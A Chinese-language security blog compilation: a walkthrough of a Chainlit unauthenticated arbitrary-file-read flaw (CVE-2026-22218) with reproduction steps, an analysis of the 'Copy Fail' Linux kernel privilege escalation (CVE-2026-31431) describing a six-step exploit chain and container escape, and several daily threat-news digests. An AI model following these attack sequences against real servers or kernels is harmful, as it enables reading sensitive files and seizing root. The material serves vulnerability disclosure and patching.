CVE-2026-22218 Chainlit 框架任意文件读取漏洞全解析
漏洞简介
Chainlit 是一个开源的 Python 框架,专门用于快速构建对话式人工智能(Conversational AI)应用程序和大语言模型(LLM)接口。该框架基于 FastAPI 和 Socket.IO 构建,提供了丰富的用户界面组件和实时通信能力,使开发者能够轻松创建类似 ChatGPT 的对话界面。Chainlit 广泛应用于聊天机器人、AI 助手、客户服务系统等场景,支持多种 LLM 后端(如 OpenAI、Anthropic Claude、LangChain 等)的集成,并提供了完善的用户认证、会话管理、文件处理等企业级功能。
核心问题:Chainlit 在处理自定义元素(Custom Element)时,没有对用户传入的文件路径做任何验证,也没有对未认证用户进行有效拦截,导致任意人都可以让服务器读取其本地任意文件并通过接口返回给攻击者。
更具体地说,这个漏洞由两个独立的代码缺陷叠加形成:
缺陷一:权限检查形同虚设——当服务器未配置强制身份认证时,核心接口的 if current_user 判断直接被跳过
缺陷二:路径完全不做校验——用户传入的 path 字段被原封不动地传入文件读取函数,攻击者可以指向服务器上任意位置
这两个缺陷单独看都算严重,组合在一起就造成了"无认证+任意文件读取"的高危漏洞
漏洞复现
整个攻击分为两步,合计只需两次 HTTP 请求加一个 WebSocket 连接:
第一步:向 /project/element 发送 PUT 请求,在请求体中注入一个包含任意文件路径(如 /etc/passwd)的 path 字段,触发服务器读取该文件并缓存,同时通过 WebSocket 获得一个"文件令牌"(chainlitKey)
第二步:携带这个文件令牌访问 /project/file/{chainlitKey},服务器直接把刚才读取的文件内容返回给攻击者
创建一个 demo.py
import chainlit as cl
@cl.step(type="tool")
async def tool():
# Fake tool
await cl.sleep(2)
return "Response from the tool!"
@cl.on_message # this function will be called every time a user inputs a message in the UI
async def main(message: cl.Message):
"""
This function is called every time a user inputs a message in the UI.
It sends back an intermediate response from the tool, followed by the final answer.
Args:
message: The user's message.
Returns:
None.
"""
# Call the tool
tool_res = await tool()
await cl.Message(content=tool_res).send()
利用 python 虚拟环境 方便搭建环境
python -m venv venv
venv\Scripts\Activate.ps1
python -m pip install chainlit==2.9.3 #安装存在漏洞的 chainlit 版本
chainlit run demo.py -w
运行构造好的 chainlit_file_read_exploit.py 指定 url 和需要读取的文件内容,就可以将文件打印出来
漏洞分析
第一步是通过调用 PUT /project/element 接口注入恶意文件路径,当攻击者在请求参数中传入包含任意路径的 path 字段时(如 /etc/passwd ),服务器端的 persist_file() 函数会读取该路径指定的文件内容并将其复制到临时目录中,同时将临时文件路径与一个随机生成的文件标识符(file_id)建立映射关系并注入到当前会话的文件映射表(session.files)中,随后服务器通过 WebSocket 消息将这个文件标识符(chainlitKey)推送给客户端,攻击者需要监听 WebSocket 连接来捕获这个关键的文件ID。
server.py#update_thread_element
update_thread_element 函数接收到请求后,首先调用 Element.from_dict() 方法解析请求体中的元素字典,该方法根据 type 字段判断元素类型并创建对应的对象实例,当 type 为 custom 时会创建 CustomElement 对象,随后服务器调用该对象的 update() 方法。
element.py#from_dict
在创建过程中 from_dict() 方法会提取请求中的所有字段包括用户可控的 path 字段并传递给对象构造函数,此时恶意路径(如 /etc/passwd )被完整保存到 CustomElement 对象的 path 属性中。
element.py#CustomElement#update
调用CustomElement 的 update() 方法,该方法内部会调用父类 Element 的 send() 方法。
element.py#Element#send
首先 send() 方法调用 await self._create(persist=persist) 执行文件持久化处理
element.py#Element#create
_create() 方法检测到对象存在 path 属性后会调用 session.persist_file() 函数
session.py#BaseSession#persist_file
session.persist_file() 函数,该函数使用 aiofiles 异步读取攻击者指定路径的文件内容,将内容复制到会话专属的临时目录中(如 /tmp/chainlit/{session_id}/{file_id} ),同时生成一个随机的文件标识符(UUID格式),并在会话的文件映射表(session.files)中建立该标识符与临时文件路径的映射关系。
element.py#Element#send
成文件持久化后 send() 方法执行第二个关键操作,调用 await context.emitter.send_element(self.to_dict()) 将元素信息发送到前端
element.py#Element#to_dict
to_dict() 方法负责将 CustomElement 对象转换为字典格式,该字典包含对象的所有关键属性如 id 、type 、name 、display 以及最重要的 chainlitKey(即刚才获得的文件标识符)
emitter.py#send_element
转换后的字典通过 send_element() 方法传递给 emitter 的 emit 函数
该函数是在 WebSocket 连接建立时注入到会话对象中的闭包函数,它调用 Socket.IO 的全局发送方法将包含 chainlitKey 的元素字典通过 WebSocket 推送给客户端,攻击者通过监听 WebSocket 消息流捕获事件名为 element 的消息,从消息数据中提取 chainlitKey 字段的值即可获得文件标识符,至此完成第一步的路径注入、文件复制和标识符获取操作。
第二步是使用第一步获得的文件标识符访问 GET /project/file/{file_id} 接口来读取文件内容,服务器根据请求中的 session_id 参数定位到对应的会话对象,从该会话的文件映射表中查找文件ID对应的临时文件路径,由于权限检查存在 if current_user: 的逻辑缺陷,未认证用户可以绕过权限验证,服务器直接使用 FileResponse 返回临时文件的内容,而该临时文件已经是目标敏感文件的完整副本,从而实现任意文件读取,整个攻击过程无需任何身份认证,攻击者仅需建立一个匿名 WebSocket 连接即可完成利用。
server.py#get_file
get_file() 函数通过 WebsocketSession.get_by_id() 方法根据 session_id 从全局会话字典中获取对应的会话对象,从该会话对象的 files 映射表中查找 file_id 对应的文件记录,获取其中存储的临时文件路径,最后使用 FileResponse() 直接返回该临时文件的内容给客户端,由于临时文件已经是目标敏感文件的完整副本,攻击者成功获得任意文件的内容。
漏洞修复
目前官方已发布修复版本,建议用户尽快更新至 Chainlit 的修复版本或更高版本:Chainlit ≥ 2.9.4
官方在 2.9.4 版本中通过引入 _sanitize_custom_element() 输入清理函数修复了该漏洞,该函数采用白名单机制重构了 update_thread_element() 和 delete_thread_element() 两个接口的元素处理逻辑,在创建 CustomElement 对象时仅提取并验证 id、name、display、props 等合法字段,而将用户可控的 path 字段从输入参数中完全排除,使得攻击者即使在请求中注入包含路径遍历字符的恶意 path 值,该字段也会在对象构造阶段被自动过滤丢弃,无法传递到后续的文件操作流程中,从根本上阻断了通过 /proje
潜伏9年通杀全版本!Copy Fail 内核提权漏洞分析(CVE-2026-31431)
2026年4月29日,国际安全研究团队Theori的研究员Taeyang Lee正式公开了代号为Copy Fail的Linux内核高危漏洞,官方编号CVE-2026-31431。这一漏洞在Linux内核中潜伏近9年,影响2017年至今几乎所有主流Linux发行版,攻击者仅需获得本地普通用户权限,运行一段732字节的Python脚本,即可稳定获取系统最高root权限,甚至实现容器逃逸,直接突破Kubernetes集群的隔离边界。
相较于历史上名震一时的Dirty Cow、Dirty Pipe等内核提权漏洞,Copy Fail的利用门槛更低、稳定性更强、隐蔽性更高,堪称近年来Linux生态最具威胁的本地提权漏洞之一。本文将从漏洞基础信息、核心原理、利用链路、危害影响到修复方案,进行全方位深度解析。
一、漏洞基础信息速览
二、漏洞核心原理深度解析
Copy Fail漏洞的本质,是三个看似完全合理的内核特性/代码优化,在时间线的交叉中形成了致命的逻辑缺陷,最终导致攻击者可以向只读的文件页缓存(page cache)写入受控数据,实现权限提升。
我们先拆解漏洞形成的三个核心基石,再还原完整的漏洞逻辑:
1. 漏洞形成的三个关键节点
漏洞并非单一代码错误导致,而是长达6年的三次内核变更叠加的结果,每一次变更单独审查都无明显安全问题,组合后却成为了核弹级漏洞:
2011年:authencesn 算法模板加入内核,用于支持IPsec的64位扩展序列号,该算法会在解密操作中,向输入缓冲区的末尾写入4字节的序列号数据,当时仅使用调用者提供的内存作为临时缓冲区,无安全风险。
2015年:内核AF_ALG加密接口新增AEAD算法支持,允许普通用户无特殊权限通过套接字调用内核加密能力,同时支持通过splice()系统调用,将文件页缓存直接传入加密操作,无需用户态内存拷贝。同年authencesn切换新API,但其末尾写入的特性未做变更,此时加密操作采用out-of-place模式,不会直接修改源文件缓存。
2017年:内核提交了72548b093ee3号优化补丁,将AF_ALG的AEAD加密操作改为in-place模式,直接在源数据所在的内存页执行加密/解密操作,减少内存拷贝提升性能。正是这一补丁,彻底打通了漏洞的完整链路,让只读文件的页缓存可以被内核加密逻辑直接修改。
2. 漏洞核心逻辑一句话总结
内核通过in-place优化,将只读的文件页缓存放入了本不该拥有写权限的加密操作散列表中,而authencesn算法在解密过程中,会向输入缓冲区末尾写入攻击者可控的4字节数据,最终实现对只读文件页缓存的受控篡改。
这里有两个关键的技术细节,决定了漏洞的杀伤力:
页缓存(page cache)的特性:Linux内核会将磁盘上的文件加载到内存页缓存中,所有用户态对文件的访问都会优先命中缓存,且缓存是全局共享的——容器与宿主机、不同进程之间,同一个文件的页缓存是同一份。
无磁盘写入的隐蔽篡改:攻击者仅修改内存中的页缓存,不会修改磁盘上的源文件,传统的文件完整性校验工具(如tripwire、AIDE)无法检测到篡改,只有系统重启后缓存才会失效,隐蔽性极强。
三、完整利用链路拆解
Copy Fail的利用过程无竞态条件、无复杂的内存喷射,是一条直线型的攻击路径,稳定性接近100%,完整利用分为6个核心步骤:
步骤1:无权限初始化加密上下文
攻击者以本地普通用户身份,通过AF_ALG套接字初始化AEAD加密上下文,指定使用authencesn算法模板,整个过程无需root权限,Linux默认允许所有用户调用该接口。
步骤2:获取目标setuid程序的只读句柄
攻击者打开系统中自带的setuid root程序(如/usr/bin/su、/usr/bin/sudo),获取其只读文件句柄。这类程序默认属于root用户,且设置了setuid位,普通用户无法直接修改磁盘文件,但可以正常读取执行。
步骤3:通过splice()将页缓存传入内核
攻击者调用splice()系统调用,将目标setuid程序的文件页缓存,零拷贝传入之前初始化的AF_ALG加密套接字中。这一步是漏洞利用的关键——无需将文件内容拷贝到用户态,直接将内核态的只读缓存页交给加密模块处理。
步骤4:触发in-place解密操作,篡改页缓存
攻击者构造特殊的加密输入,触发authencesn算法的解密操作。内核通过in-place模式,直接在传入的只读页缓存上执行解密逻辑,authencesn算法会向输入缓冲区的末尾写入攻击者可控的4字节数据,完成对只读页缓存的静默篡改。
步骤5:注入恶意代码,篡改程序执行逻辑
攻击者通过多次构造输入,向/usr/bin/su的页缓存中注入恶意shellcode,修改其执行逻辑——让原本需要密码验证的su程序,直接为执行用户赋予root权限。
步骤6:执行篡改后的程序,获取root权限
攻击者在用户态执行/usr/bin/su程序,系统会优先执行已经被篡改的内存页缓存中的代码,无需任何密码验证,直接获得UID=0的root shell,完成提权。
容器逃逸拓展利用
由于Linux的页缓存在容器和宿主机之间是全局共享的,攻击者可以在低权限容器中,通过相同的利用链路,篡改宿主机上的setuid程序页缓存。当宿主机上的root用户执行该程序时,就会触发攻击者注入的恶意代码,实现从容器到宿主机的逃逸,直接接管整个Kubernetes节点。
漏洞复现:
四、漏洞危害与影响面
Copy Fail漏洞的危害,远超普通的内核提权漏洞,核心体现在4个维度:
1. 极宽的影响范围,全版本通杀
漏洞影响2017年至今发布的几乎所有Linux内核版本,覆盖Ubuntu、Debian、RHEL、CentOS、SUSE、Amazon Linux、Arch Linux等全球主流发行版,无论是企业级服务器、个人PC、云主机、物联网设备,只要使用了未打补丁的Linux内核,均受影响。
2. 极低的利用门槛,极高的稳定性
漏洞利用无需复杂的内核版本适配,一套732字节的Python脚本即可通杀所有受影响版本;无竞态条件、无内存堆喷、无复杂的漏洞利用技巧,即使是入门级攻击者,也能一键完成提权,且利用成功率接近100%,不会导致系统崩溃。
3. 极强的隐蔽性,传统检测手段失效
攻击者仅修改内存中的页缓存,不会对磁盘上的源文件做任何修改,传统的文件完整性校验、主机入侵检测系统(HIDS)很难检测到攻击行为;只有系统重启后,页缓存才会重置,在此之前,攻击者可以长期维持root权限。
4. 云原生场景致命风险,容器逃逸无压力
在Docker、Kubernetes等容器化场景中,该漏洞可以直接突破容器的隔离边界,攻击者通过低权限容器即可篡改宿主机的文件缓存,实现容器逃逸,进而接管整个集群节点,对企业私有云、公有云容器平台造成毁灭性打击。
五、与历史经典提权漏洞对比
Copy Fail漏洞常被拿来与Dirty Cow、Dirty Pipe对比,但其在多个维度的威胁性都实现了“超越”,核心对比如下:
六、修复方案与应急缓解措施
针对该漏洞,Linux内核社区已发布官方修复补丁,同时提供了临时应急缓解方案,建议所有Linux用户根据自身场景,尽快完成修复。
1. 永久修复方案:升级内核版本
该漏洞的官方修复补丁提交号为a664bf3d603d,核心是回退了2017年的in-place优化补丁,将AF_ALG的AEAD操作改回out-of-place模式,从根源上断开只读页缓存与可写加密操作的连接。
各主流发行版用户,可通过以下命令升级内核至安全版本:
Debian/Ubuntu 系列
apt update && apt upgrade linux-image-generic -y
# 升级完成后必须重启系统生效
reboot
RHEL/CentOS/Rocky Linux 系列
yum update -y
# 升级完成后必须重启系统生效
reboot
Arch Linux 系列
pacman -Syu linux
# LTS版本执行 pacman -Syu linux-lts
# 升级完成后必须重启系统生效
reboot
2. 临时应急缓解措施(无法立即重启升级时使用)
若业务系统无法立即重启升级内核,可通过以下方式临时阻断漏洞利用,且不会影响IPsec等正常加密功能:
方式1:禁用algif_aead内核模块
# 写入模块黑名单,永久禁用
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf
# 临时卸载已加载的模块
rmmod algif_aead 2>/dev/null || true
然而,值得高度警惕的是系统状态的“驻留污染”问题。正如漏洞测试者与安全社区成员在 GitHub Issues 中所反馈的,一旦恶意脚本曾被执行,即使后续卸载了存在漏洞的内核模块,或者禁用了其加载,此前通过漏洞越界刮擦写入所污染的二进制代码片段仍然驻留在该服务器的物理页缓存中 。如果不对此类内存态的污染进行清理,依赖受损二进制文件(如 /etc/passwd)的系统服务或认证模块(例如系统管理员日常执行 su 或发生 UID 解析请求的 ls、scp 等应用)仍会出现解析错误,甚至允许被留置的后门继续作为 Root 运行 。
为了确保系统的彻底洁净,除了执行全局重启外,管理员还可以通过特定指令强制回收并驱逐受污染的页缓存。例如,通过向内核虚拟文件系统下达丢弃缓存的强制指令:
echo 3 > /proc/sys/vm/drop_caches
方式2:通过seccomp限制AF_ALG套接字创建
对于容器化业务,可在容器运行时配置seccomp策略,禁止非特权用户创建AF_ALG套接字,阻断容器内的漏洞利用;对于主机业务,可通过systemd配置服务的seccomp规则,限制业务进程的AF_ALG权限。
注意:临时缓解措施仅为应急方案,无法彻底修复漏洞,建议仍在业务窗口期尽快完成内核升级并重启。
七、漏洞启示与总结
Copy Fail漏洞的出现,再次给整个Linux生态和安全行业敲响了警钟:
性能优化与安全的平衡:漏洞的根源是一次为了提升性能的代码优化,在减少内存拷贝的同时,打破了内核的权限隔离边界。内核开发中,任何涉及内存操作、权限边界的优化,都必须经过严格的安全审计,尤其是in-place操作这类直接修改源内存的逻辑。
组合漏洞的审计盲区:单个无风险的特性,与其他特性组合后可能形成致命漏洞,这是内核安全审计的最大难点之一。传统的逐行代码审计很难发现这类跨模块、跨时间线的组合漏洞,基于上下文的全链路安全分析、AI辅助审计将成为未来内核安全的重要方向。
常态化的漏洞管理不可松懈:该漏洞潜伏近9年才被发现,而一旦公开,攻击者可以快速利用其发起攻击。无论是企业还是个人用户,都需要建立常态化的漏洞监测与修复机制,及时跟进内核和系统安全更新,尤其是服务器、云主机等核心资产,必须缩短漏洞修复的窗口期。
截至本文发布,已有多个安全厂商监测到该漏洞的在野利用尝试,建议所有Linux用户立即自查内核版本,尽快完成补丁升级,避免遭受攻击。
参考来源:
Linux内核官方修复补丁:https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=a664bf3d603d
Theori团队官方披露:https://github.com/Theori-Inc/copy-fail-CVE-2026-31431
SuSE安全公告:https://www.suse.com/security/cve/CVE-2026-31431.html
Amazon安全公告:https://explore.alas.aws.amazon.com/CVE-2026-31431.html
Ubuntu安全公告:https://ubuntu.com/security/CVE-2026-31431
厦门大学信息与网络中心漏洞通告:http://inc.xmu.edu.cn/info/1041/9412.htm
Tenable漏洞公告:https://jp.tenable.com/plugins/nessus/309203
PoC:https://github.com/theori-io/copy-fail-CVE-2026-31431、https://github.com/tgies/copy-fail-c
网络安全日报 2026年05月07日
1、CloudZ借助微软PhoneLink窃取短信验证码
https://blog.talosintelligence.com/cloudz-pheno-infostealer/ 研究人员发现CloudZ远控木马新增此前未见的恶意插件“Pheno”,可滥用微软Windows 10/11预装的Phone Link功能,从受害主机本地访问相关SQLite数据库,进而窃取手机短信、一次性密码及部分认证应用通知内容。研究人员认为,该入侵活动至少自今年1月起活跃,目的可能是窃取凭证和临时验证码。攻击链从受害者执行伪装成ScreenConnect更新程序的样本开始,随后投放Rust加载器和.NET加载器,安装CloudZ并通过计划任务实现持久化。.NET加载器
2、AmazonSES遭滥用绕过检测发起钓鱼攻击
https://securelist.com/amazon-ses-phishing-and-bec-attacks/119623/ 研究人员发现攻击者正越来越多地滥用亚马逊简单邮件服务Amazon SES发送高仿真钓鱼邮件。由于SES属于可信合法邮件基础设施,相关邮件更容易通过SPF、DKIM和DMARC等认证检查,传统基于信誉和IP封禁的防护效果也会减弱。研究人员认为,此轮滥用增长与大量AWS访问密钥在GitHub仓库、.env文件、Docker镜像、备份和公开S3桶中泄露有关,攻击者可借助TruffleHog等工具自动扫描密钥、验证权限并批量发信。已观察到的活动包括伪装DocuSign
3、ScarCruft借游戏平台传播BirdCall恶意软件
https://www.welivesecurity.com/en/eset-research/rigged-game-scarcruft-compromises-gaming-platform-supply-chain-attack/ 网络攻击组织ScarCruft自2024年末以来通过游戏平台相关域名sqgame.net传播BirdCall恶意软件,主要针对Android用户实施攻击。报道指出,该恶意软件具备监控与窃取数据能力,可能被用于收集受害者设备中的敏感信息。标题同时提到该活动波及Windows平台,但现有内容重点披露的是其借助游戏平台渠道投放恶意程序,以及对Android用户的持
4、人工智能辅助攻击在2026年加速升级
https://www.sonatype.com/state-of-the-software-supply-chain/2026/open-source-malware 人工智能正持续降低网络攻击门槛,并在2025年显著放大攻击活动的速度、规模与影响。文中提到,攻击者借助AI能力,能够更快发现并利用漏洞、优化攻击流程,从而提升威胁行动的效率。相关趋势已体现在实际事件中,例如涉及700万用户的数据泄露案例,反映出AI辅助攻击对大规模受害面的推动作用。整体来看,该报道强调,随着AI被越来越多地用于攻击链条中的各个环节,网络威胁正朝着更自动化、更高频和更具破坏性的方向发展,给组织防御带来更大压力。
5、黑客滥用Google服务发起大规模脸书钓鱼攻击
https://guard.io/labs/accountdumpling---hunting-down-the-google-sent-phishing-wave-compromising-30-000-facebook-accounts 研究人员发现攻击者正滥用Google AppSheet与Google Drive发起大规模钓鱼活动,以绕过安全过滤机制并窃取Facebook商业账户。相关行动据称已影响约3万名用户,目标遍及全球。攻击者利用看似可信的Google基础设施托管内容或跳转页面,使钓鱼链接更容易通过邮件和平台的安全审查,并提升受害者信任度。此次事件主要针对Facebook Bu
6、两名网安从业者因协助BlackCat勒索攻击获刑四年
https://www.justice.gov/opa/pr/two-americans-who-attacked-multiple-us-victims-using-alphv-blackcat-ransomware-sentenced 两名网络安全从业人员因在2023年协助实施BlackCat(又称ALPHV)勒索软件攻击,被分别判处4年监禁。案件显示,具备专业安全能力的内部或关联人员若被滥用,可能显著放大网络攻击风险。报道指出,这些行为帮助攻击者实施入侵与勒索,造成约120万美元赎金影响,也再次凸显勒索软件团伙与技术人员勾连带来的现实威胁。该案反映出司法部门正持续加强对勒索软件活动及其
7、ConsentFixv3自动化滥用AzureOAuth流程
https://www.bleepingcomputer.com/news/security/consentfix-v3-attacks-target-azure-with-automated-oauth-abuse/ 一种名为ConsentFix v3的新型攻击技术正在黑客论坛传播,被描述为针对Microsoft Azure的自动化OAuth滥用手法。该方法延续此前ConsentFix系列思路,核心是诱导受害者在真实微软登录流程中获取并回传OAuth授权码,从而在无需密码、即使启用多因素认证的情况下换取令牌并接管账户。v3版本的改进在于引入自动化与规模化能力:攻击者会先验证目标是否使用Az
8、QuasarLinux恶意程序瞄准开发者系统
https://www.trendmicro.com/en_us/research/26/e/quasar-linux-qlnx-a-silent-foothold-in-the-software-supply-chain.html 研究人员披露一种此前未公开记录的Linux恶意植入体Quasar Linux(QLNX),其主要针对开发者与DevOps环境,涉及npm、PyPI、GitHub、AWS、Docker和Kubernetes等平台。该恶意程序集成rootkit、后门和凭证窃取能力,可在受害主机上动态编译rootkit共享对象与PAM后门模块,并通过内存驻留、删除落地二进制、清理日志
9、微软披露跨26国大规模网络钓鱼活动
https://www.microsoft.com/en-us/security/blog/2026/04/30/email-threat-landscape-q1-2026-trends-and-insights/ 微软披露一起大规模凭证窃取型网络钓鱼活动。根据通报,攻击者面向26个国家的用户发起攻击,波及超过3.5万名用户,并影响1.3万多家组织。此次事件表明,网络钓鱼仍是威胁企业与个人账户安全的常见手段,攻击规模跨越多个国家和大量机构,影响范围较广。已披露信息重点指出,这是一次以窃取登录凭证为目的的攻击行动,受害对象涵盖众多组织中的终端用户。报道未进一步说明具体攻击链、涉事攻击组织身份
10、Wiz活动披露PostgreSQL二十年旧漏洞
https://www.zeroday.cloud/blog/postgres-xint 在Wiz举办的ZeroDay.Cloud活动上,研究人员披露了存在于PostgreSQL中的一组约20年历史的安全问题,引发业界对数据库安全风险的关注。报道指出,相关漏洞涉及PostgreSQL扩展组件pgcrypto,说明部分长期存在的代码缺陷可能影响数据库的加密相关功能与整体安全性。事件公开后,安全社区和用户被提醒尽快关注官方修复进展并部署补丁,以降低潜在攻击面。该消息也再次表明,广泛使用的开源基础软件即使经过长期发展,仍可能隐藏多年未被发现的漏洞,数据库运维与安全团队需要持续开展版本更新、漏洞评估
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2026年05月06日
1、Bluekit钓鱼工具包借AiTM绕过多因素认证
https://www.varonis.com/blog/bluekit 研究人员近日发现一款名为Bluekit的新型AI驱动网络钓鱼工具包,该工具包将传统分散的钓鱼攻击流程整合为一体化平台。Bluekit提供超过40个网站模板,涵盖iCloud、Gmail、GitHub、Twitter等主流服务,并集成自动域名注册、双因素认证绕过、地理位置模拟、反机器人伪装等功能,内置Telegram作为默认数据泄露渠道。其AI助手支持Llama、GPT-4.1、Claude等多种模型,可生成钓鱼活动框架,但目前输出仍依赖大量占位符,尚未达到"一键生成"的自动化水平。研究人员指出,该工具包处于积极开发阶段
2、TeamPCP供应链攻击波及SAP相关npm包
https://socket.dev/blog/sap-cap-npm-packages-supply-chain-attack 研究团队披露一起疑似供应链攻击事件,该事件与TeamPCP相关,波及SAP云应用编程模型(CAP)及Cloud MTA生态的4个npm包,分别为mailto:mbt@1.2.48、@cap-js/db-service@2.10.1等。受影响版本被注入预安装脚本,会下载并执行未经验证的Bun二进制文件,窃取开发者及CI/CD环境中的各类凭据,还会通过GitHub仓库外泄数据并自我传播。据悉,这些包每周总下载量超57万,潜在影响范围广泛。目前受影响版本已被取消发布。
3、CursorAI隐藏Git钩子漏洞可致代码执行
https://hackread.com/cursor-ai-ide-vulnerability-code-execution-git-hooks/ 安全研究人员披露,Cursor AI IDE存在高危漏洞,编号为CVE-2026-26268。根据报道,该问题与隐藏的Git hooks有关,攻击者可通过构造恶意代码仓库,在开发者克隆仓库后触发恶意代码执行。该漏洞的风险在于利用场景贴近日常开发流程,用户在正常获取项目代码时即可能中招,从而使本地开发环境面临被植入恶意程序或执行未授权操作的威胁。该漏洞目前尚未披露更具体的技术细节、受影响版本范围及修复进展。
4、大规模短信诈骗活动在全球多国蔓延
https://www.bitdefender.com/en-us/blog/labs/operation-road-trap 研究人员披露自2025年12月起持续追踪的大规模短信诈骗活动"道路陷阱行动"。该活动已波及美国、加拿大、英国、澳大利亚、印度等12个国家,累计发送超7.9万条欺诈短信,涉及3.19万个不同恶意URL。诈骗分子冒充各国交通管理部门、收费公路运营商及停车服务机构,以未缴通行费、停车罚单或交通罚款为由,通过伪造发件人ID、短代码发送及URL缩短技术诱导受害者点击链接。该恶意软件通过Telegram实时回传设备信息、短信内容及银行验证码,并利用Firebase实现远程命令控
5、国际联合执法行动重创加密货币诈骗中心
https://www.govinfosecurity.com/fbi-backed-takedown-hits-crypto-scam-centers-a-31551 近日由迪拜当局牵头、美国FBI及国际合作伙伴支持的联合执法行动,成功捣毁一个跨国加密货币诈骗中心网络,在中东和东南亚地区逮捕至少276人,联邦政府已对该诈骗网络的招聘人员和管理人员提起诉讼。据悉,此次行动是美国协助开展的规模最大的跨国网络诈骗打击行动之一,涉案诈骗中心关联Ko Thet公司等实体,这些诈骗中心自2024年起通过社交工程手段,伪装身份诱骗受害者在虚假平台投资,涉案资金通过加密货币账户快速转移。
6、热门WordPress重定向插件被曝潜伏后门多年
https://anchor.host/wordpress-plugin-hijacked-in-2020-hid-a-dormant-backdoor-for-years/ 拥有逾7万安装量的WordPress插件Quick Page/Post Redirect被发现曾在约五年前被植入后门。研究人员Austin Ginder在排查其托管环境中12个触发安全告警的网站时发现,官方5.2.1和5.2.2版本在2020至2021年间包含隐藏的自更新机制,会连接第三方域名anadnet.com,从而绕过WordPress.org分发任意代码。2021年3月,部分站点还从外部服务器静默接收了被篡改的
7、PyTorchLightning供应链攻击致凭证窃取
https://thehackernews.com/2026/04/pytorch-lightning-compromised-in-pypi.html 研究人员发现PyTorch Lightning在供应链攻击中受到影响,恶意版本Lightning 2.6.2和2.6.3于4月30日被发布,并植入了隐藏载荷,用于窃取凭证信息。事件曝光后,相关恶意包已被PyPI隔离,并触发了强制修复措施,以降低进一步扩散和滥用风险。报道标题还提及intercom-client同样遭到供应链攻击,但给定内容主要披露的是PyTorch Lightning恶意版本及其行为。此次事件再次表明,开源生态中的软件包一旦
8、Trellix确认源码库遭未授权访问
https://www.trellix.com/statement/ 网络安全公司Trellix确认发生源码相关安全事件,攻击者曾获得对部分代码仓库的未授权访问。通报显示,此次事件涉及源代码层面的暴露风险,但目前尚未发现相关访问被进一步利用的证据,也未确认出现由此直接引发的产品或客户环境受损情况。尽管如此,源码仓库被入侵仍可能带来潜在安全影响,包括敏感实现细节暴露、后续漏洞研究风险上升等,因此该事件引发业界对软件供应链与代码托管安全的关注。现阶段公开信息有限,事件具体范围和成因仍有待进一步披露。
9、恶意Ruby与Go软件包攻击CI流水线窃密
https://socket.dev/blog/malicious-ruby-gems-and-go-modules-steal-secrets-poison-ci 研究人员发现针对Ruby Gems和Go Modules的软件供应链攻击正在利用“休眠”恶意包渗透持续集成(CI)流水线。这些恶意组件在被开发或构建环境引入后,可窃取凭据、篡改CI工作流,并进一步建立持久化访问能力。报道指出,此类攻击不仅影响构建过程本身,还可能导致敏感数据外泄,扩大对代码仓库、自动化系统及相关基础设施的威胁范围。该事件再次凸显了开源依赖管理与CI/CD环境安全防护的重要性,包括审查第三方包来源、限制凭据权限,以
10、cPanel严重漏洞遭大规模利用投放勒索软件
https://www.bleepingcomputer.com/news/security/critrical-cpanel-flaw-mass-exploited-in-sorry-ransomware-attacks/ 研究人员发现编号为CVE-2026-41940的cPanel/WHM高危身份认证绕过漏洞在披露后即被大规模利用,攻击者可借此进入控制面板并入侵网站服务器。cPanel本周已发布紧急更新,但安全机构Shadowserver称,持续攻击中已有至少4.4万个运行cPanel的IP地址受影响。多方消息显示,相关利用最晚可追溯至2月下旬,近期攻击者自上周四起集中利用该漏洞,在Li
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2026年04月30日
1、LofyGang团伙借Minecraft外挂传播窃密木马
https://zenox.ai/en/lofystealer-malware-mirando-jogadores-de-minecraft/ 巴西黑客团伙LofyGang在沉寂三年后再次活跃,针对Minecraft玩家发起新型窃取活动。该组织将名为LofyStealer的信息窃取木马伪装成Slinky游戏外挂,利用年轻玩家对游戏场景的信任心理诱导下载执行。当受害者启动伪造外挂时,JavaScript加载器会部署chromelevator.exe载荷,从Chrome、Edge、Firefox等多款浏览器中窃取Cookie、密码、Token、银行卡和IBAN信息,回传至C2服务器。该组织已从供
2、VECT勒索软件因加密缺陷变数据擦除器
https://research.checkpoint.com/2026/vect-ransomware-by-design-wiper-by-accident/ 研究人员发现VECT 2.0勒索软件在处理加密随机数时存在严重逻辑缺陷,使其实际上成为数据擦除器而非传统勒索软件。该软件将大于128KB的文件分块加密,但所有块共用同一内存缓冲区输出nonce,导致仅最后25%文件可解密,前75%数据永久丢失。更危险的是丢失的nonce未传输给攻击者,即使受害者支付赎金,攻击者也无法提供解密工具。该缺陷存在于Windows、Linux和ESXi所有版本中,影响几乎所有企业环境中的关键文件。
3、研究人员披露新型DHL钓鱼骗局
https://www.forcepoint.com/blog/x-labs/fake-dhl-phishing-campaign-credential-theft 研究人员披露,一起冒充DHL的网络钓鱼活动采用了多达11个步骤的攻击链,目标是窃取用户密码等凭证信息。该骗局利用伪造的一次性密码(OTP)代码提升欺骗性,并借助EmailJS等服务收集受害者提交的数据。除账号凭证外,攻击者还会获取设备遥测信息,用于识别受害环境并优化后续攻击流程。此类攻击通过分阶段设计增强了隐蔽性和可信度,使受害者更容易在看似正常的交互中泄露敏感信息。研究人员提醒用户警惕以物流通知为名的邮件或页面,核实发件来源与
4、Linux曝高危权限提升漏洞Copy Fail
https://xint.io/blog/copy-fail-linux-distributions 研究团队披露CVE-2026-31431漏洞(命名“复制失败”),该漏洞存在于Linux内核身份验证加密模板,属逻辑缺陷。非特权本地用户可通过732字节Python脚本,利用AF_ALG与splice()函数链式调用,在Ubuntu、Amazon Linux等主流发行版上获取root权限。漏洞隐蔽性极强,仅修改页面缓存未改动磁盘文件,且可跨容器影响,相关补丁已提交主线内核,建议用户及时更新内核或采取缓解措施。
5、LiteLLM预认证SQL注入漏洞遭活跃利用
